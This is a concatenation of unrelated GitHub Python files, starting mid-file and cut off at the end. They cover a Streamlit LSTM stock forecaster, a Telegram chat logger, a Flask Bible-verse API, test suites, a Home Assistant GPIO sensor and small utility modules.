st.plotly_chart(fig,use_container_width=True,theme=\"streamlit\")\n\n st.subheader(\"Visualizing :blue[Train] and :blue[Test] Prediction.\")\n\n df['Close Price'] = scaler.inverse_transform(df_1)\n df['Train Predict Plot'] = trainPredictPlot\n df['Test Predict Plot'] = testPredictPlot\n\n figt = px.line(df,x=df['Date'],y=df['Close Price'])\n figt.add_scatter(x=df['Date'],y=df['Train Predict Plot'],name=\"Train prediction\")\n figt.add_scatter(x=df['Date'],y=df['Test Predict Plot'],name=\"Test prediction\",marker=dict(color='orange'))\n st.plotly_chart(figt,use_container_width=True,theme=\"streamlit\")\n\n x_input = df_1[len(df_1)-100:].reshape(1,-1)\n temp_input=list(x_input)\n temp_input=temp_input[0].tolist()\n\n # demonstrate prediction for next 30 days\n lst_output=[]\n n_steps=100\n i=0\n while(i<30):\n \n if(len(temp_input)>100):\n #print(temp_input)\n x_input=np.array(temp_input[1:])\n # print(\"{} day input {}\".format(i,x_input))\n 
x_input=x_input.reshape(1,-1)\n x_input = x_input.reshape((1, n_steps, 1))\n #print(x_input)\n yhat = model.predict(x_input, verbose=0)\n # print(\"{} day output {}\".format(i,yhat))\n temp_input.extend(yhat[0].tolist())\n temp_input=temp_input[1:]\n #print(temp_input)\n lst_output.extend(yhat.tolist())\n i=i+1\n else:\n x_input = x_input.reshape((1, n_steps,1))\n yhat = model.predict(x_input, verbose=0)\n # print(yhat[0])\n temp_input.extend(yhat[0].tolist())\n # print(len(temp_input))\n lst_output.extend(yhat.tolist())\n i=i+1\n\n #forecast plotting with matplotlib\n # day_new=np.arange(1,101)\n # day_pred=np.arange(101,131)\n\n # fig = plt.figure()\n # plt.plot(day_new,scaler.inverse_transform(df_1[len(df_1)-100:]))\n # plt.plot(day_pred,scaler.inverse_transform(lst_output))\n # st.pyplot(fig)\n\n st.subheader(\"Forecasting share prices over the next :orange[30 days] using data from the preceding :blue[100 days].\")\n #new forecast plotting with plotly\n data = []\n for value in scaler.inverse_transform(df_1[len(df_1)-100:]):\n data.append(value[0])\n \n for value in scaler.inverse_transform(lst_output):\n data.append(value[0])\n\n end_date = datetime.strptime(max(df['Date']),\"%Y-%m-%d\")\n dates = []\n for i in range(100):\n dates = deque(dates)\n dates.appendleft(end_date.date() - timedelta(days=i))\n dates = list(dates)\n\n for i in range(30):\n dates.append(end_date.date() + timedelta(days=(i+1)))\n\n forecast_df = pd.DataFrame(data, columns=['Value'])\n forecast_df['Date'] = dates\n\n forecast_plot_fig = px.line(forecast_df, x=forecast_df['Date'][:100],y=forecast_df['Value'][:100])\n forecast_plot_fig.add_scatter(x=forecast_df['Date'][100:],y=forecast_df['Value'][100:],name = 'Forecasted Share Price',marker=dict(color=\"orange\"))\n forecast_plot_fig.update_layout(xaxis_title=\"Date\",yaxis_title=\"Price\")\n st.plotly_chart(forecast_plot_fig,use_container_width=True,theme=\"streamlit\")\n\n # fig2 = go.Figure()\n # trace1 = px.line(y=scaler.inverse_transform(df_1[len(df_1)-100:]),x=day_new)\n # trace2 = px.line(y=scaler.inverse_transform(lst_output),x=day_pred)\n # trace2.update_traces(line_color='orange')\n # fig2.add_trace(trace1.data[0])\n # fig2.add_trace(trace2.data[0])\n # st.plotly_chart(fig2,use_container_width=True,theme=\"streamlit\")","repo_name":"zeel-04/Stock-price-prediction-using-LSTM","sub_path":"LSTM_model.py","file_name":"LSTM_model.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5216786270","text":"\nfrom pyrogram.types import Message\n\nfrom app_init import app_init, verify_logger_group\n\n\napp = app_init()\n\nverify_logger_group(app)\n\n\n@app.on_message()\nasync def my_handler(client, message: Message):\n m = await app.get_messages(message.chat.id, message.id)\n print(m)\n # ID чата\n chat_id = str(m.chat.id)\n # Получаем ID Юзера\n # print(repr(m))\n\n sender_id = m.sender_chat.id if 'from_user' not in repr(m) else m.from_user.id\n # Получаем ID сообщения\n msg_id = m.id\n # Получаем юзера\n sender = m.from_user.username if 'from_user' in repr(m) else 'Channel'\n # Получаем имя юзера\n from_name = ' '.join([str(m.from_user.first_name),\n str(m.from_user.last_name)]) if 'from_user' in repr(m) else 'Channel'\n # print(m.from_user.first_name, m.from_user.last_name)\n # получаем имя группы\n chat_title = m.chat.title if 'title' in repr(m.chat) else m.chat.username\n\n # полчаем текст сообщения\n msg = ['*no text message*'] if m.text is None else 
m.text.split('\\n')\n msg = msg[0]\n with open(\"Chat_log.txt\", 'a', encoding='utf-8') as f:\n f.writelines(f\"ID: {m.date} {chat_id} {chat_title} >> \"\n f\"(ID: {sender_id}) {from_name} ({sender}) - (ID: {msg_id}) {msg}\\n\")\n print(f\"ID: {m.date} {chat_id} {chat_title} >> (ID: {sender_id}) {from_name} ({sender}) - (ID: {msg_id}) {msg}\")\n\n\nprint('Tele_log is running')\napp.run()\n","repo_name":"DipodDP/TeleTools","sub_path":"tele_log.py","file_name":"tele_log.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26634415632","text":"import os\nfrom flask import Blueprint, request, jsonify, current_app\nimport requests\nfrom app.models.verse import Verse, Topic\nfrom app import db\n\nverse_bp = Blueprint('verse', __name__)\n\n@verse_bp.route('/assign_topic', methods=['POST'])\ndef assign_topic():\n verse_id = request.json.get('verse_id')\n topic_id = request.json.get('topic_id')\n\n verse = Verse.query.get(verse_id)\n topic = Topic.query.get(topic_id)\n\n if not verse or not topic:\n return jsonify({'message': 'Verse or topic not found'}), 404\n\n verse.topics.append(topic)\n db.session.commit()\n\n return jsonify({'message': 'Verse assigned to topic successfully'}), 201\n\n@verse_bp.route('/get_verses_by_topic', methods=['GET'])\ndef get_verses_by_topic():\n topic_id = request.args.get('topic_id')\n\n topic = Topic.query.get(topic_id)\n\n if not topic:\n return jsonify({'message': 'Topic not found'}), 404\n\n verses = topic.verses.all()\n verse_texts = [verse.text for verse in verses]\n\n return jsonify({'verses': verse_texts})\n\n\n@verse_bp.route('/search_verses', methods=['GET'])\ndef search_verses():\n search_query = request.args.get('query')\n\n if not search_query:\n return jsonify({'message': 'Search query is required'}), 400\n\n \n # Retrieve the BIBLE_API_KEY from .env file\n api_key = current_app.config['BIBLE_API_KEY']\n bibleVersionID = 'de4e12af7f28f599-01'\n offset = 0\n\n if not api_key:\n return jsonify({'message': 'Bible API key is missing'}), 500\n\n # Retrieve verses from the Bible API based on search query\n\n headers = {'api-key': api_key, 'accept': 'application/json'}\n api_url = f'https://api.scripture.api.bible/v1/bibles/{bibleVersionID}/search?query={search_query}&offset={offset}'\n\n response = requests.get(api_url, headers=headers)\n\n if response.status_code != 200:\n return jsonify({'message': 'Failed to retrieve verses from the API'}), 500\n\n verses_data = response.json()['data']['verses']\n # Extract and format the relevant verse information from the API response\n verses = [{'text': verse_data['text'], 'reference': verse_data['reference']} for verse_data in verses_data]\n\n return jsonify({'verses': verses})","repo_name":"Hannah1Watkins/Backend_Bible_Verse_App","sub_path":"app/routes/verse_routes.py","file_name":"verse_routes.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19482324176","text":"import os\nimport json\n\nfrom ensenso_nxlib import NxLibCommand, NxLibException\nfrom ensenso_nxlib.helper import fix_nxlib_prefix, convert_camel_to_upper_snake\n\nfrom bin import file_appender as appender\n\nGENERATED_FILE_PATH = \"constants_generated.py\"\nDELETE_AND_GENERATE_NEW_FILE = \"w\"\n\nCONSTANTS_PREFIX = {'Commands': 'cmd', 'Errors': 'err', 'Items': 'itm',\n 'Values': 'val', 'ApiErrors': 'NxLib', 'ItemTypes': 'NxLib'}\n\n\ndef 
generate_constants_from_loaded_lib():\n print(\"Generating ensenso_nxlib constants...\")\n cmd = NxLibCommand(\"GetConstants\")\n cmd.execute()\n result = cmd.result()\n itm = result.as_json()\n json_object = json.loads(itm)\n\n # Create the py file\n file_object = open(GENERATED_FILE_PATH, DELETE_AND_GENERATE_NEW_FILE)\n for constant_type in json_object:\n # In order to ignore command results like time etc.\n if(isinstance(json_object[constant_type], list)):\n\n prefix = CONSTANTS_PREFIX[constant_type]\n for constant in json_object[constant_type]:\n variable_name = None\n value = None\n if isinstance(constant, dict):\n variable_name = prefix + constant['Name']\n value = constant['Value']\n else:\n variable_name = prefix + constant\n value = str(constant)\n variable_name = convert_camel_to_upper_snake(variable_name)\n if variable_name.startswith('NX_LIB'):\n variable_name = fix_nxlib_prefix(variable_name)\n\n if isinstance(value, str):\n file_object.write(\n \"{} = \\\"{}\\\"\\n\".format(variable_name, value))\n else:\n file_object.write(\n \"{} = {}\\n\".format(variable_name, value))\n\n file_object.close()\n\n print(\"...finished.\")\n\n pass\n\n\nif __name__ == '__main__':\n generate_constants_from_loaded_lib()\n\n current_directory = os.path.dirname(os.path.realpath(__file__))\n repo_directory = os.path.dirname(current_directory)\n output_name = \"constants.py\"\n package_name = \"ensenso_nxlib\"\n\n print(\"Writing constants module {} to package {}\".format(output_name, package_name))\n appender.file_appender(['header_part.txt', 'constants_generated.py', 'execute_part.txt'],\n current_directory,\n output_name,\n os.path.join(repo_directory + \"/\" + package_name, output_name))\n print(\"Please install ensenso_nxlib package now in order to make the new generated {} module available\".format(output_name))\n","repo_name":"ensenso/nxlib-python-interface","sub_path":"bin/nx_constants_generator.py","file_name":"nx_constants_generator.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"29943142535","text":"import os\nimport unittest\nimport lsst.daf.persistence as dp\nimport lsst.utils.tests\nimport shutil\nimport tempfile\n\ntry:\n FileType = file\nexcept NameError:\n from io import IOBase\n FileType = IOBase\n\n\nROOT = os.path.abspath(os.path.dirname(__file__))\n\n\ndef setup_module(module):\n lsst.utils.tests.init()\n\n\nclass GetParentFromSymlink(unittest.TestCase):\n \"\"\"A test case for getting the relative path to parent from a symlink in PosixStorage.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='GetParentFromSymlink-')\n self.parentFolderPath = os.path.join(self.testDir, \"theParent\")\n self.childFolderPath = os.path.join(self.testDir, \"theChild\")\n self.parentlessFolderPath = os.path.join(self.testDir, \"parentlessRepo\")\n for p in (self.parentFolderPath, self.childFolderPath, self.parentlessFolderPath):\n os.makedirs(p)\n relpath = os.path.relpath(self.parentFolderPath, self.childFolderPath)\n os.symlink(relpath, os.path.join(self.childFolderPath, '_parent'))\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testV1RepoWithParen(self):\n parentPath = dp.PosixStorage.getParentSymlinkPath(self.childFolderPath)\n self.assertEqual(parentPath, os.path.relpath(self.parentFolderPath, self.childFolderPath))\n\n def testV1RepoWithoutParent(self):\n parentPath = 
dp.PosixStorage.getParentSymlinkPath(self.parentlessFolderPath)\n self.assertEqual(parentPath, None)\n\n\nclass TestRelativePath(unittest.TestCase):\n \"\"\"A test case for the PosixStorage.relativePath function.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='TestRelativePath-')\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testRelativePath(self):\n \"\"\"Test that a relative path returns the correct relative path for\n 1. relative inputs, 2. absolute inputs.\"\"\"\n abspathA = os.path.join(self.testDir, 'a')\n abspathB = os.path.join(self.testDir, 'b')\n os.makedirs(abspathA)\n os.makedirs(abspathB)\n # 1.\n relpathA = os.path.relpath(abspathA)\n relpathB = os.path.relpath(abspathB)\n relpathAtoB = dp.PosixStorage.relativePath(relpathA, relpathB)\n self.assertEqual('../b', relpathAtoB)\n # 2.\n relpathAtoB = dp.PosixStorage.relativePath(abspathA, abspathB)\n self.assertEqual('../b', relpathAtoB)\n\n\nclass TestAbsolutePath(unittest.TestCase):\n \"\"\"A test case for the PosixStorage.absolutePath function.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='TestAbsolutePath-')\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testAbsolutePath(self):\n \"\"\"Tests that given a path and a relative path, the correct aboslute\n path to the relative path is returned.\"\"\"\n abspathA = os.path.join(self.testDir, 'a')\n abspathB = os.path.join(self.testDir, 'b')\n os.makedirs(abspathA)\n os.makedirs(abspathB)\n relpathA = os.path.relpath(abspathA)\n self.assertEqual(abspathB,\n dp.PosixStorage.absolutePath(abspathA, '../b'))\n self.assertEqual(abspathB,\n dp.PosixStorage.absolutePath(relpathA, '../b'))\n\n\nclass TestGetLocalFile(unittest.TestCase):\n \"\"\"A test case for the PosixStorage.getLocalFile function.\"\"\"\n\n def setUp(self):\n self.testDir = tempfile.mkdtemp(dir=ROOT, prefix='TestGetLocalFile-')\n\n def tearDown(self):\n if os.path.exists(self.testDir):\n shutil.rmtree(self.testDir)\n\n def testAbsolutePath(self):\n \"\"\"Tests that GetLocalFile returns a file when it exists and returns\n None when it does not exist.\"\"\"\n storage = dp.PosixStorage(self.testDir, create=True)\n self.assertIsNone(storage.getLocalFile('foo.txt'))\n with open(os.path.join(self.testDir, 'foo.txt'), 'w') as f:\n f.write('foobarbaz')\n del f\n f = storage.getLocalFile('foo.txt')\n self.assertIsInstance(f, FileType)\n self.assertEqual(f.read(), 'foobarbaz')\n f.close()\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\nif __name__ == '__main__':\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"lsst-dm/legacy-daf_persistence","sub_path":"tests/test_posixStorage.py","file_name":"test_posixStorage.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"17437886524","text":"from db import DB\nfrom unittest.mock import Mock\n\n\ndef test_db_connection_real():\n db_real = DB() # db simulates slow database connection\n assert len(db_real.list_tables()) == 3\n assert db_real.list_tables() == (\"users\", \"products\", \"orders\")\n\n\ndef test_db_connection_mock():\n db_mock = Mock()\n db_mock.list_tables.return_value = (\"users\", \"products\", \"orders\")\n assert len(db_mock.list_tables()) == 3\n assert db_mock.list_tables() == (\"users\", \"products\", 
\"orders\")\n","repo_name":"mihaivalentistoica/Softwer-Testing-Advance-Feauture","sub_path":"02-mock/test_example-02.py","file_name":"test_example-02.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20415751495","text":"\"\"\"\nSupport for binary sensor using Beaglebone Black GPIO.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/binary_sensor.bbb_gpio/\n\"\"\"\nimport logging\n\nimport voluptuous as vol\n\nimport homeassistant.components.bbb_gpio as bbb_gpio\nfrom homeassistant.components.binary_sensor import (\n BinarySensorDevice, PLATFORM_SCHEMA)\nfrom homeassistant.const import (DEVICE_DEFAULT_NAME, CONF_NAME)\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nDEPENDENCIES = ['bbb_gpio']\n\nCONF_PINS = 'pins'\nCONF_BOUNCETIME = 'bouncetime'\nCONF_INVERT_LOGIC = 'invert_logic'\nCONF_PULL_MODE = 'pull_mode'\n\nDEFAULT_BOUNCETIME = 50\nDEFAULT_INVERT_LOGIC = False\nDEFAULT_PULL_MODE = 'UP'\n\nPIN_SCHEMA = vol.Schema({\n vol.Required(CONF_NAME): cv.string,\n vol.Optional(CONF_BOUNCETIME, default=DEFAULT_BOUNCETIME): cv.positive_int,\n vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,\n vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE):\n vol.In(['UP', 'DOWN'])\n})\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_PINS, default={}):\n vol.Schema({cv.string: PIN_SCHEMA}),\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the Beaglebone Black GPIO devices.\"\"\"\n pins = config.get(CONF_PINS)\n\n binary_sensors = []\n\n for pin, params in pins.items():\n binary_sensors.append(BBBGPIOBinarySensor(pin, params))\n add_devices(binary_sensors)\n\n\nclass BBBGPIOBinarySensor(BinarySensorDevice):\n \"\"\"Representation of a binary sensor that uses Beaglebone Black GPIO.\"\"\"\n\n def __init__(self, pin, params):\n \"\"\"Initialize the Beaglebone Black binary sensor.\"\"\"\n self._pin = pin\n self._name = params.get(CONF_NAME) or DEVICE_DEFAULT_NAME\n self._bouncetime = params.get(CONF_BOUNCETIME)\n self._pull_mode = params.get(CONF_PULL_MODE)\n self._invert_logic = params.get(CONF_INVERT_LOGIC)\n\n bbb_gpio.setup_input(self._pin, self._pull_mode)\n self._state = bbb_gpio.read_input(self._pin)\n\n def read_gpio(pin):\n \"\"\"Read state from GPIO.\"\"\"\n self._state = bbb_gpio.read_input(self._pin)\n self.schedule_update_ha_state()\n\n bbb_gpio.edge_detect(self._pin, read_gpio, self._bouncetime)\n\n @property\n def should_poll(self):\n \"\"\"No polling needed.\"\"\"\n return False\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n return self._state != self._invert_logic\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/binary_sensor/bbb_gpio.py","file_name":"bbb_gpio.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"26199108995","text":"\"\"\"\nModule which stores data parsing/preprocessing functions\n\nThis module implements the following functionality:\n 1. parse_data\n 2. clean_nans\n 3. handle_booleans\n 4. datatype_casting\n 5. credit_score_filtering\n 6. 
parse_preprocess_data\n\nAuthor: Jared Andrews\nDate: 6/9/23\n\"\"\"\n\nimport logging\nimport warnings\nimport os\nimport pandas as pd\nfrom src.config import date_cols, input_cols, intermediate_data_fp, target_feature, data_fp\nfrom src.utils import clean_folder\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n\ndef parse_data(fp, logger):\n \"\"\"\n Parsing in of data used in model training\n\n :param fp: File path to read raw data from\n :param logger: Logger\n :return: parsed raw data\n \"\"\"\n\n assert os.path.exists(fp), \"Specified file path does not exist\"\n\n clean_folder(data_fp)\n\n try:\n # Read in application data (descriptors of a loan)\n app_data = pd.read_excel(fp, engine='openpyxl', sheet_name='Application Data',\n parse_dates=date_cols)\n\n # Read in loan performance data (binary indicator of loan quality)\n loan_performance = pd.read_excel(fp, engine='openpyxl', sheet_name='Loan Performance')\n\n except ValueError as err:\n logging.critical(err, exc_info=True)\n raise err\n\n loan_performance['customer_id'] = loan_performance['idLoan'].str.split('-').str[0].str.lower()\n # Merge app data and loan performance data; note merge occurs on customer_id and not on loanid; 3 customers had\n # good and bad loan performances and so impossible to determine if app data is for good bad loan\n data = app_data.merge(loan_performance, on=['customer_id'])\n # Drop unnecessary customer_id and idLoan features (unique identifiers)\n data.drop(['customer_id', 'idLoan'], axis=1, inplace=True)\n # Determine if missing columns exist in input data\n missing_cols = list(set(input_cols) - set(data.columns))\n assert len(missing_cols) == 0, f\"Input data is missing following features: {str(missing_cols)}\"\n\n logger.info(f\"Raw data successfully read with dimension: {data.shape}\")\n return data\n\n\ndef clean_nans(data, logger):\n \"\"\"\n Handling of nans in input data\n\n :param data: Input data (raw)\n :param logger: Logger\n :return: dataframe with nans removed\n \"\"\"\n\n # Determine which columns contains nans so that these columns can be dealt with on an individual basis\n na_vals = data.isna()\n na_cols = data.columns[data.isna().any()]\n # Utilize dataframe to create logging info on columns and their nan counts (if nans exist)\n nan_df = pd.DataFrame(zip(na_vals[na_cols].sum(), na_vals[na_cols].mean()),\n columns=['nan_count', 'proportion_nan'], index=na_cols).sort_values('nan_count')\n\n logger.info(\"NaNs present in raw data:\")\n for (c, count, prop) in list(zip(nan_df.index, nan_df['nan_count'], nan_df['proportion_nan'])):\n logger.info(f\"\\tCol: {c}, Count: {count}, Proportion: {prop}\")\n\n # bank_account_duration: nan because payment_ach = 0 (additional context required on payment_ach and\n # bank_account_duration fields), since only 1 row will drop\n data = data[data['bank_account_duration'].notnull()]\n\n # how_use_money: dropping nan for bank_account_duration dropped 1 out of 2 how_use_money nan rows; since only 1\n # row will drop\n data = data[data['how_use_money'].notnull()]\n\n # payment_amount_approved: this is a feature that occurs after approval and will not exist in data in production,\n # drop feature as a result\n # other_phone_type: not an important feature, will drop feature\n data.drop(['payment_amount_approved', 'other_phone_type'], axis=1, inplace=True)\n\n logger.info(\"Successfully handled NaN values\")\n return data\n\n\ndef handle_booleans(data, logger):\n \"\"\"\n Handling of booleans in input data\n\n :param data: Input data (nans 
handled)\n :param logger: Logger\n :return: dataframe with booleans handled\n \"\"\"\n\n # Convert bool to 0/1 feature for model\n bool_cols = data.select_dtypes('bool').columns\n logger.info(f\"Bool Features:\\n\\t{', '.join(list(bool_cols) + [target_feature])}\")\n data[bool_cols] = data[bool_cols].astype(int)\n # Convert target variable (flgGood) to 0/1 feature for model\n data[target_feature] = data[target_feature].map({'Good': 1, 'Bad': 0})\n return data\n\n\ndef datatype_casting(data, logger):\n \"\"\"\n Handling of proper data types in input data\n\n :param data: Input data (nans & booleans handled)\n :param logger: Logger\n :return: dataframe with proper datatypes handled\n \"\"\"\n\n # Zip code, bank routing number are numeric representations of categorical features\n logger.info(f\"Converting {', '.join(['address_zip', 'bank_routing_number'])} to strings\")\n data['address_zip'] = data['address_zip'].astype(str)\n data['bank_routing_number'] = data['bank_routing_number'].astype(str)\n return data\n\n\ndef credit_score_filtering(data, logger):\n \"\"\"\n Handling of proper data types in input data\n\n :param data: Input data (nans & booleans handled, datatypes cast)\n :param logger: Logger\n :return: dataframe with incorrect FICO/L2C scores removed\n \"\"\"\n # Scores should be in range [300, 850]; filter out any rows where FICO/L2C scores are outside of this range\n data_len = len(data)\n data = data[(data[[c for c in data.columns if 'FICO' in c]] > 300).all(axis=1) &\n (data[[c for c in data.columns if 'FICO' in c]] < 850).all(axis=1) &\n (data['raw_l2c_score'] > 300) & (data['raw_l2c_score'] < 850)].reset_index(drop=True)\n num_rows_filtered = data_len - len(data)\n logger.info(f\"{num_rows_filtered} rows removed by FICO/L2C filtering\")\n return data\n\n\ndef parse_preprocess_data(args, logger):\n \"\"\"\n Main data parsing/preprocessing function used before EDA is performed\n\n :param args:\n data_fp: contains File path to read raw data from\n :param logger: Logger\n :return: Preprocessed dataframe\n \"\"\"\n print(\"START: Parsing and initial data preprocessing\")\n data = parse_data(args.data_fp, logger)\n data = clean_nans(data, logger)\n data = handle_booleans(data, logger)\n data = datatype_casting(data, logger)\n data = credit_score_filtering(data, logger)\n\n logger.info(f\"Intermediate data successfully processed with dimension: {data.shape}\")\n\n logger.info(f\"Saving intermediate data to file\")\n data.to_csv(intermediate_data_fp, index=False)\n print(\"DONE: Parsing and initial data preprocessing\")\n\n return data\n","repo_name":"jaredandrews97/Sample-Project-BlastPoint","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5329790354","text":"from collections import defaultdict, deque\nclass Node:\n def __init__(self,x):\n self.val=x\n self.left=None\n self.right=None\n\nclass Solution:\n def __init__(self):\n self.graph=defaultdict(list)\n\n def build_graph(self,parent,child):\n if parent and child:\n self.graph[parent.val].append(child.val)\n self.graph[child.val].append(parent.val)\n\n if child.left:\n self.build_graph(child,child.left)\n if child.right:\n self.build_graph(child,child.right)\n\n def Solve(self,A,B,C):\n self.build_graph(None,A)\n q=deque()\n q.append((B,1))\n vis = set([B])\n ans = []\n while q:\n i,j=q.popleft()\n for node in self.graph[i]:\n if node not in vis:\n if j==C:\n ans.append(node)\n 
q.append((node,j+1))\n vis.add(node)\n return ans if len(q) < C else [B]\n\nroot=Node(1)\nroot.left=Node(2)\nroot.right=Node(3)\nroot.left.left=Node(4)\nroot.left.right=Node(5)\nroot.right.left=Node(6)\nroot.right.right=Node(7)\nroot.left.left.left=Node(8)\n\nA=Solution()\nB=3\nC=0\nprint(A.Solve(root,B,C))\n","repo_name":"srajsonu/InterviewBit-Solution-Python","sub_path":"Trees/BST/node_distace_C_BT.py","file_name":"node_distace_C_BT.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14308736046","text":"import os\nimport sys\n\nfrom cyberbrain import trace\n\n\n@trace\ndef main(file, inputs):\n text = file.read().rstrip()\n had_placeholders = False\n tmpl = \"Give me {} {}: \"\n\n while True:\n brackets = find_brackets(text)\n if not brackets:\n break\n\n start, stop = brackets\n placeholder = text[start : stop + 1]\n pos = placeholder[1:-1]\n article = \"an\" if pos.lower()[0] in \"aeiou\" else \"a\"\n answer = inputs.pop(0) if inputs else input(tmpl.format(article, pos))\n text = text[0:start] + answer + text[stop + 1 :]\n had_placeholders = True\n\n if had_placeholders:\n print(text)\n else:\n sys.exit(f'\"{args.file.name}\" has no placeholders.')\n\n\ndef find_brackets(text):\n \"\"\"Find angle brackets\"\"\"\n\n start = text.index(\"<\") if \"<\" in text else -1\n stop = text.index(\">\") if start >= 0 and \">\" in text[start + 2 :] else -1\n return (start, stop) if start >= 0 and stop >= 0 else None\n\n\nif __name__ == \"__main__\":\n os.chdir(os.path.dirname(__file__))\n main(\n file=open(\"romeo_juliet.txt\", \"rt\"),\n inputs=[\n \"cars\",\n \"Detroit\",\n \"oil\",\n \"pistons\",\n \"stick shift\",\n \"furious\",\n \"accelerate\",\n \"42\",\n \"foot\",\n \"hammer\",\n ],\n )\n","repo_name":"laike9m/Cyberbrain","sub_path":"examples/mad_libs/mad_libs.py","file_name":"mad_libs.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":2453,"dataset":"github-code","pt":"76"} +{"seq_id":"6953845638","text":"# 2013.11.15 11:25:27 EST\n# Embedded file name: scripts/client/AvatarInputHandler/mathUtils.py\nimport BigWorld\nimport Math\nfrom Math import Vector2, Vector3, Matrix\nimport random\nimport math\n\ndef createIdentityMatrix():\n result = Matrix()\n result.setIdentity()\n return result\n\n\ndef createRotationMatrix(rotation):\n result = Matrix()\n result.setRotateYPR(rotation)\n return result\n\n\ndef createTranslationMatrix(translation):\n result = Matrix()\n result.setTranslate(translation)\n return result\n\n\ndef createRTMatrix(rotation, translation):\n result = Matrix()\n result.setRotateYPR(rotation)\n result.translation = translation\n return result\n\n\ndef createSRTMatrix(scale, rotation, translation):\n scaleMatrix = Matrix()\n scaleMatrix.setScale(scale)\n result = Matrix()\n result.setRotateYPR(rotation)\n result.translation = translation\n result.preMultiply(scaleMatrix)\n return result\n\n\ndef clamp(minVal, maxVal, val):\n if minVal > val:\n return minVal\n if maxVal < val:\n return maxVal\n return val\n\n\ndef clampVector3(minVal, maxVal, val):\n return Vector3(clamp(minVal.x, maxVal.x, val.x), clamp(minVal.y, maxVal.y, val.y), clamp(minVal.z, maxVal.z, val.z))\n\n\ndef clampVectorLength(minLength, maxLength, vector):\n length = vector.length\n if not almostZero(length):\n if minLength > length:\n return vector / length * minLength\n if maxLength is not None and maxLength < length:\n return vector / length * 
maxLength\n return vector * 1.0\n\n\ndef matrixScale(vector, scaleCoeff):\n return Vector3(vector.x * scaleCoeff.x, vector.y * scaleCoeff.y, vector.z * scaleCoeff.z)\n\n\ndef almostZero(val, epsilon = 0.0004):\n return -epsilon < val < epsilon\n\n\nclass RandomVectors:\n\n @staticmethod\n def random2(magnitude = 1.0, randomGenerator = None):\n if randomGenerator is None:\n randomGenerator = random\n u = randomGenerator.random()\n yaw = 2 * math.pi * u\n return Vector2(math.sin(yaw) * magnitude, math.cos(yaw) * magnitude)\n\n @staticmethod\n def random3Flat(magnitude = 1.0, randomGenerator = None):\n randomVec2 = RandomVectors.random2(magnitude, randomGenerator)\n return Vector3(randomVec2.x, 0.0, randomVec2.y)\n\n @staticmethod\n def random3(magnitude = 1.0, randomGenerator = None):\n if randomGenerator is None:\n randomGenerator = random\n u = randomGenerator.random()\n v = randomGenerator.random()\n yaw = 2 * math.pi * u\n pitch = math.acos(2 * v - 1)\n sin = math.sin(pitch)\n return Vector3(math.sin(yaw) * sin * magnitude, math.cos(pitch) * magnitude, math.cos(yaw) * sin * magnitude)\n\n\nclass FIRFilter(object):\n\n def __init__(self, coeffs = None):\n self.coeffs = coeffs\n self.values = [ Vector3(0) for x in xrange(len(self.coeffs)) ]\n self.__id = 0\n self.value = Vector3(0)\n\n def reset(self):\n self.values = [ Vector3(0) for x in xrange(len(self.coeffs)) ]\n self.__id = 0\n\n def add(self, value):\n self.values[self.__id] = value\n self.value = Vector3(0)\n for id, coeff in enumerate(self.coeffs):\n self.value += self.values[self.__id - id] * coeff\n\n self.__id += 1\n if self.__id >= len(self.values):\n self.__id = 0\n return self.value\n\n\nclass SMAFilter(FIRFilter):\n\n def __init__(self, length):\n FIRFilter.__init__(self, [ 1.0 / length for x in xrange(length) ])\n\n\nclass LowPassFilter(object):\n\n def __init__(self, alpha):\n self.value = Vector3(0)\n self.alpha = alpha\n\n def reset(self):\n self.value = Vector3(0)\n\n def add(self, value):\n self.value = value * self.alpha + (1 - self.alpha) * self.value\n return self.value\n\n\nclass RangeFilter(object):\n value = property(lambda self: self.filter.value)\n\n def 